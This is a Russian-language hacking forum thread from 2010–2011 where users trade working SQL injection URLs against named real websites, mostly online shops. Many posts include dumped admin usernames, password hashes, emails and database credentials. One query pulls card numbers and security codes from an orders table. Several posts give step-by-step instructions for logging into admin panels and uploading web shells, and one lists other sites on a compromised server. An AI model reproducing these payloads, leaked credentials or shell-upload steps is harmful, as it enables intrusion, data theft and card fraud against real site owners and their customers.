RE: Ваши Sql-инъекции
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Ваши Sql-инъекции - 2010-12-05 00:39:26.590000
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
Не надо путать топики!
Здесь выкладывают,полностью или почти полностью (user(),version(),database()) sql-инъекции ,для остальных вопросов соседний топик—>
http://forum.xakep.ru/m_978175/mpage_1/key_/tm.htm#978175
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-05 09:41:14.210000
|
|
|
homicide2
Сообщений: 121
Оценки: 0
Присоединился: 2010-10-19 15:55:36.693333
|
quote:
незнаю кто чем крутит))) но хави очень многое не докручивает. поэтому все перепроверяется ручками)) еще одна ссылочка http://download.wamoncam.com/paypal.php?id=14
Дак выложи, раскрученную скулю……
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-05 20:46:56.170000
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
:DШарики,шары и все что с ними связано
www.donballon.ru/shop/index.php?action=show_info&id_goods=-3304+union+select+concat(user(),0x3a,version(),database())–&id_group=79
donballon@localhost
5.0.51a-3ubuntu5-log
donballon
есть колонка member .дальше не крутил ,кому надо докрутит
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-06 15:30:07.016666
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
shop'чик :)
http://master-shini.spb.ru/buy.php?id=-737+union+select+1,2,3,4,5,6,7,8,9,10,concat(login,0x3a,password,0x0b),12,13+from+users+limit+0,30+–+&list=1
LoneCat:a8a6ff24647ee6ede2bd47a8be7f09f3(stacenol)
Админко:admin.php
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-07 16:02:52.570000
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
ещё один шоп:)
http://www.inyahead.com.au/index.php?action=view_paypal&id=-328+/*!union*/+select+1,2,3,/*!group_concat(username,0x3a,password*/,0x0b),5,6,7,8+/*!from*/+/*!inyahead_inyahead.exponent_user*/+–+&module=paypalmodule&src=%40random45516bca29829 (один большой фильтр[&:]) login:passwd=inyahead:019bdc8d4083985e4423c40c6d75c940(22404040) вход в админку наверху страницы (login) , активно помогал раскрутить скулю товарищ R1DEX ,за что ему огромное спасибо:D
P.S.может кто сумеет шелл залить,у меня не получилось,файло льётся,но не исполняется 'Internal Server Error' вылетает,кто сумеет отпишитесь
какой то буржуйский хостинг походу:
http://www.westfifth.com/order.php?id=-2+union+select+1,2,3,group_concat(user(),0x0b,version(),0x0b,database(),0x0b,@@version_compile_os,0x0b),5,6,7,8–
5.0.51a-3ubuntu5.7
westfifth
debian-linux-gnu
Every 3 Months
шоп ,зафильтрован как сайт правительства Кубы:D:D
https://www.davidrayrobinson.com/order.php?id=-1+/*!union*/+select+1,2,3,/*!concat*/(schema_name,0x0b)+from+information_schema./*!schemata*/+limit+1,1–+
5 ветка
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-09 19:53:15.360000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.evt-me.com/products.php?cat=1&sub=7+union+all+select+1,2,3,4,concat(id,0x3a,lname,0x3a,pass,0x3a,username),6,7,8,9,10+from+users--
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-10 00:02:04
|
|
|
kekz
Сообщений: 90
Оценки: 0
Присоединился: 2010-01-19 22:10:36.450000
|
1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Home', num_clicks=num_clicks+1, added_cart='true', categories_viewed='b:0;', pro' at line 1
in:
[UPDATE supertracker SET last_click = NOW(), exit_page='/index.php?InjectTyT'', exit_page_name='Home', num_clicks=num_clicks+1, added_cart='true', categories_viewed='b:0;', products_viewed='', customer_id='18479', completed_purchase='false', cart_contents='a:1:{s:36:"501:0008810ddd81d5415f2205a10538deb7";a:4:{s:3:"qty";s:1:"1";s:7:"back_no";s:0:"";s:9:"back_name";s:0:"";s:10:"attributes";a:1:{i:1;s:1:"1";}}}', cart_total = '32.5', order_id = '0' WHERE tracking_id='986154'] у кого какие мысли order+by+10 не работает вообще никак не реагирует
инекция вводиться где написанно InjectTyT
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-10 13:26:30.640000
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
http://www.amys.com/products/product_view.php?id=-501+union+select+1,2,3,group_concat(username,0x3a,password,0x3a,grp,0x3a,access,0x0b),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53+from+apollo12.admin_users+–+
тиц:10
pr:5 получили список админов и пользователей +пароли,затем логинимся—www.amys.com/admin под любым админом,жмём "upload new items"заполняем форму ,грузим шелл.
Шелл будет находиться здесь:http://www.amys.com/admin/data/files/имя_шелл.php;):)можно попробовать получить root;).
ссылкаЗдесь доп. материалы,а также сам шелл для "ленивых"
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-10 18:03:13.176666
|
|
|
ton1ght.
Сообщений: 434
Оценки: 0
Присоединился: 2010-08-22 10:49:36.826666
|
AndreySasovo респект!
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-10 18:34:28.476666
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
онлайн магазин:)www.pakistanonlineshop.com/detail1.php?id=-57+/*!union*/+select+1,2,/*!concat*/(user_name,0x3a,password,0x0b),4,5,6+from+wwwpaki_onlineshop.login–
логинимся :admin/login.php затем жмём Running Products->egit(создаем новый или редактируем новый продукт) добавляем на место картинки продукта свой веб шелл.Шелл будет находиться здесь–>www.pakistanonlineshop.com/admin/images/shell.php
пример:
www.pakistanonlineshop.com/admin/images/KA_uShell.php:)
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-10 19:40:46.920000
|
|
|
egor455
Сообщений: 200
Оценки: 0
Присоединился: 2010-07-29 15:29:29
|
AndreySasovo
Спасибо…
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-10 20:22:48.603333
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
www.arthobbycreativ.ro/idei2.php?subcatid=-353+/*!union*/+select+1,2,/*!concat*/(/*!convert*/(name+using+latin1),0x3a,/*!convert*/(pass+using+latin1),0x3a,/*!convert*/(email+using+latin1),0x0b),4,5,6,7,8,9,10,11,12+from+arthobby_aart.user–
Gonczi Ferenc:26dff9bd0f57c7a9:gonczif@yahoo.com
Fabian Levente:20addc1a283479f9:fador@clicknet.ro
Fabian Csaba:4e78cbb0116b3424(hobby):furotorony@yahoo.co.uk
Админка:admin
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-10 23:55:51.980000
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
www.gitech.ro/prod-det.php?id=-2+union+select+1,2,group_concat(id,0x3a,login,0x3a,parola,0x3a,email,0x0b),4,5,6,7,8,9,10+from+mggitech.users–
Админку не нашел
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-11 13:03:42.406666
|
|
|
oblomo
Сообщений: 2
Оценки: 0
Присоединился: 2010-09-08 18:43:20.226666
|
Доброе время суток!
Нашел сайт http://gamefon.net/image/2933 тут есть уязвимости
узнал что в таблице 18 колонок
я новичок так что пожалуйста
помогите сформировать запрос
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-11 14:34:41.203333
|
|
|
ton1ght.
Сообщений: 434
Оценки: 0
Присоединился: 2010-08-22 10:49:36.826666
|
quote:
http://gamefon.net/image/2933
помогите сформировать запрос
Для запроса нужна ссылка вида .php?id= ну или .asp?id=
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-11 20:40:35.120000
|
|
|
oblomo
Сообщений: 2
Оценки: 0
Присоединился: 2010-09-08 18:43:20.226666
|
понятно
дайте пожалуйста ссылку где можно потренироваться
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-11 21:10:09.153333
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
quote:
ORIGINAL: ton1ght.
quote:
http://gamefon.net/image/2933
помогите сформировать запрос
Для запроса нужна ссылка вида .php?id= ну или .asp?id=
Зря.не всегда так .Уязвимость как правило встречается в числовых параметрах, но также и не в числовых ,например в авторизации вот пример www.motor-shop.ru/news/-51+union+select+1,group_concat(login,0x3a,password,0x3a,email,0x0b),3+from+motorsh_msh.users–
Как видно никакой id нету:)
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-11 21:26:51.650000
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
quote:
ORIGINAL: oblomo
Доброе время суток!
Нашел сайт http://gamefon.net/image/2933 тут есть уязвимости
узнал что в таблице 18 колонок
я новичок так что пожалуйста
помогите сформировать запрос
Тут однозначно есть уязвимость,но рулить тебе придется только подзапросами ,пример: gamefon.net/image/2933+and+substring(version(),1,1)=5 выводит то же что и при запросе :gamefon.net/image/2933 значит версия mysql=>5.для примера попробуй подставить вместо 5 , четверку или тройку получишь ошибку,то есть данные придется выводить посимволно(5-первая цифра версия mysql) З.ы.ищи инфу по подзапросы или про слепые mysql инъекции:) пробуй силы здесь,обиван киноби:D:www.mavru.az/page3.php?new=1&type=2&cat=0&size=2(уязвимость в параметре size),удач
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-13 22:21:37.643333
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
(О современных способах защиты серверов):D
Долго держал эту скуль,всё пытался "вылечить"сервер:Dспасти не удастся видимо,уже удалил порядка 20! разнообразных шеллов….увы сохранить воду в "решете" сложновато:DТак,о чём это я??Приступим:):
жертва:http://expo.tourlider.com.ua/modules/orders/tour-order.php?id=61
имеет уязвимость в параметре id,получаем скулю:):http://expo.tourlider.com.ua/modules/orders/tour-order.php?id=61+and+1=0+Union+Select+1,group_concat(login,0x3a,password,0x0b),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+tourlider_expo.delice_managers+– и связка логин пароль менеджера у нас в кармане.ищем админку,она тут—–>:)
http://expo.tourlider.com.ua/admin/login.php.идём на прекрасный сервис от antichat`a —>http://crackfor.me ,расшифровываем пароль—->admin:c4ca4238a0b923820dcc509a6f75849b(1)долго ржем пацталом[sm=bj.gif](так как пароль =1).Логинимся в админке —->входим—>управление модулями—>выставки—>добавить Выставку—>добавляем (везде пишем че хотим)—>где логотип ставим "наш" логотип ,а именно шелл,у меня фильтр спокойно проглотил с расширением php.
после обновления страницы под формоё аплоада "логотипа"жмём на картинке;)"копировать адрес изображения" или на исходном коде страницы ищите примерно такую строчку:"<td><img src="/img/ex/turi_Exhibitions_1292253833.php"></td>" там и будет ваш шелл скрипт просто меняет его название.(мой шелл:http://expo.tourlider.com.ua/img/ex/turi_Exhibitions_1292253833.php)
Вкусности:
в итоге вы "получили" шелл ,права :33 ( www-data ) Group: 33 ( www-data )Linux h1.newname.com.ua 2.6.18-6-686-bigmem #1 SMP Sat Aug 15 19:03:20 UTC 2009 i686(может кто root добьётся:))
в корне сервера есть след.сайты:
тИЦ PR
angel.com.ua 10 3
atg-travel.com 20 3
boomtour.com.ua 0 2
czechtours.com.ua 20 2
dealer-party.com.ua 10 2
extour.com.ua 10 2
forum.extour.com.ua 0 n/a
forums.pslan.kiev.ua 0 1
med-portal.com.ua 40 2
neftegastrading.com 0 1
rim-excurs.ru 0 2
shop.extour.com.ua 10 2
turi100.net 350! 4!
udav.com.ua 0 0
videomix.com.ua 10 2
www.angel.com.ua 10 3
www.atg-travel.com 20 3
www.croupier.com.ua 10 2
www.resort.com.ua 20 2
www.turi100.net 350! 4! Ко всем есть доступ на просмотр:)
forums.pslan.kiev.ua имеет форум(ipb) зарегистрировано [sm=ai.gif] 139405 человек[sm=al.gif]
З.ы. НЕ УБИВАЙТЕ РЕСУРС
З.з.ы от плюсов не отказался бы:)
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-19 19:53:17.203333
|
|
|
HellViper
Сообщений: 353
Оценки: 0
Присоединился: 2010-07-02 14:11:23.330000
|
http://www.coshuk.com/html/images.php?id=-6+union+select+1,group_concat(0x3a,loginname,0x3a,password+SEPARATOR+0x3a),3,4,5,6,7,8,9,10,11,12,13+from+phplist_admin–
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-20 16:55:27.350000
|
|
|
Saaar
Сообщений: 129
Оценки: 0
Присоединился: 2008-05-19 21:05:59.910000
|
http://www.blamm.com/top10.php?id=-1+union+select+1,2,3,concat(user(),0x3a,database(),0x3a,version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47--
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-21 03:04:43.113333
|
|
|
aloola
Сообщений: 11
Оценки: 0
Присоединился: 2010-12-03 22:25:14.846666
|
http://www.orientalplazza.co.uk/phoneorder/restaurant-index.php?id=15067+limit+0+union+select+mid(group_concat(table_name),370,1600),2,3+from+information_schema.tables
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-24 08:56:37.450000
|
|
|
GaMeSTeR001
Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
|
http://3b.nweurope.eu/page/projetIdea.php?p=&id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,group_concat(AUSR_LOGIN,0x3B,AUSR_PWD+SEPARATOR+0x0b)+FROM+nweurope.ADMUSER
http://3b.nweurope.eu/admin/ -админка
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-24 13:18:27.153333
|
|
|
aloola
Сообщений: 11
Оценки: 0
Присоединился: 2010-12-03 22:25:14.846666
|
http://www.nu-urbanmusic.co.uk/drum_and_bass/shop/product_info.php?products_id=-18742'+union+select+group_concat(version(),0x3a,user(),0x3a,database())+–+
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-24 14:57:06.603333
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.avicom.co.il/page.php?id=-5+union+select+1,version(),3,4--
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-26 20:02:28.916666
|
|
|
aloola
Сообщений: 11
Оценки: 0
Присоединился: 2010-12-03 22:25:14.846666
|
http://www.regimentals.co.uk/viewphoto.php?shoph=53970+union+select+1,GROUP_CONCAT(ID,0x3a,OrderID,0x3a,Name,0x3a,Address,0x3a,DelAddress,0x3a,0x3a,Telephone,0x3a,Email,0x3a,Comment,0x3a,Currency,0x3a,TotalDelivery,0x3a,PaymentMethod,0x3a,StartDate,0x3a,Expirydate,0x3a,CardNo,0x3a,SecurityNo,0x3a,IssueNo,0x3a,Tax),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+Orders
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-29 16:22:51.410000
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
Шарашка какая то
www.goodstream.ru/products/show.php?id=-99+union+select+1,version(),3,4,5,6,7,group_concat(schema_name,0x0b),9,10,11,12,13,14,15,16,17,18,19,20,database(),22,23,24,25,26,27,28,29,30,user(),32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122+from+information_schema.schemata–
122 столбца[sm=ai.gif] а админ тута—>www.goodstream.ru/admin
пускает без логина пароля!
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-30 16:11:36.093333
|
|
|
scav
Сообщений: 5
Оценки: 0
Присоединился: 2010-12-29 21:25:57.723333
|
Добил все же скулинжект)
Где можно декоднуть?
ef3e37b7fb663dbcbd3301d9c980a8f0
это админ пароль(ваш к.о)
где можно хэш декоднуть?
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-30 17:06:51.913333
|
|
|
scav
Сообщений: 5
Оценки: 0
Присоединился: 2010-12-29 21:25:57.723333
|
Вот
http://gamefon.net/image/-2932+UNION+SELECT+1,2,3,4,5,6,7,8,9,group_concat(nick,0x0d0a,type,0x0d0a,hashpass,0x0d0a,salt,0x0d0a,hashc,0x0d0a,name,0x0d0a,surname,0x0d0a,email,0x0d0a,datereg,0x0d0a,datebirth,0x0d0a,country,0x0d0a,city,0x0d0a,motto,0x0d0a,about,0x0d0a,photo,0x0d0a),11,12,13,14+FROM+b27370_gamefon.users+WHERE+nick=0x61646d696e--
инфы - хоть киллера нанимай :D (Шучу, кнешн)
пароля в базе хэшей нету, кому не лень - вперед)
|
|
|
|
|
RE: Ваши Sql-инъекции - 2010-12-30 21:18:35.226666
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
слепая:
http://www.ukrtelecom.ua/webparts/bdelivery?z=4&s=4+and+31337-31337=0
П.С. Ставьте все ссылки в тэги
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-01-01 13:34:27.650000
|
|
|
AndreySasovo
Сообщений: 231
Оценки: 0
Присоединился: 2009-12-16 01:05:19.880000
|
[sm=az.gif][sm=az.gif][sm=az.gif]С наступившем новым годом всех :D
http://climatedesign.com.ua/index.php?page=articles&articles_id=-1+union+select+1,2,3,concat(user(),0x0b,database(),0x0b,version()),5,6,7,8,9,10,11,12,13,14,15,16,17–
http://konkord.dp.ua/catalog.php?id=-30+union+select+1,2,3,4,group_concat(user(),0x0b,database(),0x0b,version()),6,7,8,9+–+
http://tnp-td.com/index.php?page=articles&article_id=-10+union+select+1,2,3,group_concat(user(),0x0b,database(),0x0b,version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20–
http://uhs.com.ua/index.php?page=news&news_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(user(),0x0b,version(),0x0b,database()),12,13,14,15,16,17,18,19,20,21+–+
http://massager.net.ua/index.php?page=catalog&cat_id=999999+union+select+1,2,concat(user(),0x0b,version(),0x0b,database()),4,5,6,7,8–
Все сайты компании http://generix.com.ua/portfolio.
уязвимые скрипты:index.php?page=catalog&cat_id=
catalog.php?id=
index.php?page=news&news_id=
.другие не проверял.Сами найдете:)
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-01-10 16:33:33.313333
|
|
|
GaMeSTeR001
Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
|
http://www.shopoldcoloradocity.com/content.php?id=20/**/UNION/**/SELECT/**/1,2,3,4,group_concat(admin,0x3B,email,0x3B,username,0x3B,password/**/SEPARATOR/**/0x0b),6,7,8,9,10,11,12/**/FROM/**/occDB.users/* http://www.odysea.com/shop/product.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,group_concat(schema_name+SEPARATOR+0x0b),10,11,12,13,14,15,16,17,18,19+FROM+information_schema.schemata+--+ http://www.dawsonbooks.com/viewgallery.php?ID=-1+/*!UNION*/+SELECT+1,version()+--+ - дальше не могу раскрутить http://www.wiihaveaproblem.com/show_article.php?id=76+UNION+SELECT+1,2,3,4,group_concat(user_login,0x3B,user_pass+SEPARATOR+0x0b),6,7,8,9+FROM+whap_wp.wp_users http://www.bagshop.com/store/mcart.php?ID=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,version(),27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418+/*+ - 418 колонок! [sm=ai.gif]
http://www.oktava-shop.com/view_prod.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,version() http://globalnpn.com/contact.php?id=-1+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53&c=0&tag= http://www.manli.com/products/index.php?id=-1)+UNION+SELECT+1,2,3,4,group_concat(f_account,0x3B,f_password+SEPARATOR+0x0b),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+FROM+manlico_web.ft_admin+--+ http://carpc.kyferez.com/Products/products.php?id=-1'+/*!UNION*/+SELECT+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18+--+ http://www.toplift.se/en/products.php?id=-1+UNION+SELECT+1,2,3,group_concat(admin_un,0x3B,admin_pw+SEPARATOR+0x0b),5+FROM+b1685.Admin http://www.bijoudancewear.co.uk/products.php?id=-1'+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17+--+ http://www.russmiller.com/v5/products.php?id=-1+UNION+SELECT+1,2,3,version(),5,6,7,8,9 http://www.racemotorparts.com/products.php?id=-1+UNION+SELECT+1,2,concat(username,0x3B,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+db236053312.admins
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-01-17 20:53:30.023333
|
|
|
aloola
Сообщений: 11
Оценки: 0
Присоединился: 2010-12-03 22:25:14.846666
|
http://www.nagcbritain.org.uk/parents.php?id=2'+union+select+1,2,group_concat(id,access,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11,12+from+administrators+–+
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-01-21 22:53:06.760000
|
|
|
fake_magent
Сообщений: 187
Оценки: 0
Присоединился: 2010-12-19 18:43:29.280000
|
http://www.cactusjuicetm.com/ProductDetail.php?id=3+UNION+SELECT+1,2 ,3,4,grou_concat(cjorpmdatetime,0x3a,cjorpmerrormsg,0x3a,cjorpmerrorcode,0x3a,cjorpmppprotectelig,0x3a,cjorpmpppayerstatus,0x3a,cjorpmpppayerid,0x3a,cjorpmpptype,0x3a,cjorpmpppendreason,0x3a,cjorpmppstatus,0x3a,cjorpmcccvv,0x3a,cjorpmccavscode,0x3a,cjorpmccfour,0x3a,cjorpmcctype,0x3a,cjorpmtransid,0x3a,cjorpmfeeamt,0x3a,cjorpmamttaxable,0x3a,cjorpmamount,0x3a,cjorpmstatus,0x3a,cjorpmmethod,0x3a,cjorderid,0x3a,cjpaymentid),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+zcj_orpayments+LI MIT+1,1-
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-01-23 11:41:13.440000
|
|
|
GaMeSTeR001
Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
|
http://www.icabc-pd.com/pd-products-product.php?id=-1+UNION+SELECT+1,2,3,4,5,group_concat(username,0x3B,password+SEPARATOR+0x0b),7,8,9,10,11,12,13,14+FROM+dbpd.pd_users
kleung:2642
indromojo:2571
Админка:
https://www.icabc-pd.com/admin/signin.php
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-01-23 15:50:22.530000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.mexicobuyersguide.com/view.php?ID=4868+union+all%20select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76 quote:
Host IP: 208.109.197.84
Web Server: Apache/2.2.8 (Fedora)
Powered-by: PHP/5.2.6
DB Server: MySQL
Current User: root@localhost
Sql Version: 5.0.45
Current DB: db_mbg
System User: root@localhost
Host Name: ip-208-109-197-84.ip.secureserver.net
Installation dir: /usr/
DB User & Pass: root:0fe170fe15703472:localhost.localdomain
root:0fe170fe15703472:localhost
root:0fe170fe15703472:127.0.0.1
root:0fe170fe15703472:ip-208-109-197-84.ip.secureserver.net
Data Bases: information_schema
db_mbg
mysql
test
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-01-23 16:01:23.650000
|
|
|
GaMeSTeR001
Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
|
http://www.powerone.ca/products.php?id=15+and+1=0+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+--+
4 ветка
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-01-24 20:03:22.046666
|
|
|
GaMeSTeR001
Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
|
http://gamechn.com/products.php?id=260+and+1=0+UNION+SELECT+1,2,3,4,5,group_concat(table_name+SEPARATOR+0x3A),7,8,9,10+FROM+information_schema.tables+WHERE+table_schema=0x7761746368796F315F67616D6563686E
Вывод в заголовок страницы
admin:jsx296485
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-01-24 23:04:41.116666
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.sonc.org/newsonc/newDesign/calendar/calendar.php?mode=detail&id=-4577+union+select+1,version(),3,4,5,6,7,8,9,10--
4 ветка, никак не смог раскурить…. кто сможет отпишите в ЛС
|
|
|
|
|
RE: Ваши Sql-инъекции - 2011-01-24 23:39:42.436666
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://usashooting.org/viewRelease.php?id=-541+union+select+version(),2,3,4,5-- http://www.eirini-gymnastics.gr/english/athlete.php?id=-11+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14--
|
|
|
|
|
|
